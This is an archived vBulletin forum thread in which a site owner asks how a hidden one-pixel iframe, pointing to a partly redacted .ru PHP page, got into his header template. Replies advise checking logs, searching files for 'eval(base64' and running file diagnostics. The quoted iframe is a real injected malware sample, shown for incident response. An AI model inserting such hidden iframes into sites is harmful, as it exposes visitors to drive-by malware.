vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   help with unauthorized entries on my forum - badware (https://vborg.vbsupport.ru/showthread.php?t=273195)

GTX2 11-01-2011 11:00 PM
help with unauthorized entries on my forum - badware
 
Need some help from you guyz....
Today when browsing my forum website i got a warning from google telling i had some badware code somewhere. After checking google webmaster tools, they said i had this code somewhere on my website:

Code:
<iframe width=1 height=1 frameborder=0 src=http://www.**-***.ru/vb/legacy/phra.php></iframe>
(removed some letters due security reasons)

After making a search on my templates, saw this code was entered in my header template !!!
Removed immediately but now would like to investigate how someone could have gain access to my templates and my board as i am the only admin accessing the boards. AdminCP logs says no access from third parties. Where can i check other unauthorized entries?


If posting in wrong section, please forward
Thank you !

ForceHSS 11-02-2011 01:20 AM
check logs with host

Simon Lloyd 11-02-2011 02:38 AM
Sounds like you have a php fie that could have added some Eval(base64 code, you will need to search all your files for eval(base64 or even just base64 to be able to remove the lines or just overwrite the core vbulletin files (if you haven't modified them) with new ones via ftp in ASCii mode, but unless you find the php file (not one of vbulletins) thats causing it it's going to come back!

You can check vbulletins files using the diagnostics in admincp>maintainance>diagnostics>suspect file versions run this and if vbulletin finds code that doesn't belong there it will flag the file up to you, but remember it will not show you which 3rd party php file is causing the issue.

Also check here https://www.vbulletin.com/forum/show...ms-More-Secure for tips in preventing it in the future.


All times are GMT. The time now is 12:02 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01105 seconds
  • Memory Usage 1,713KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (3)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete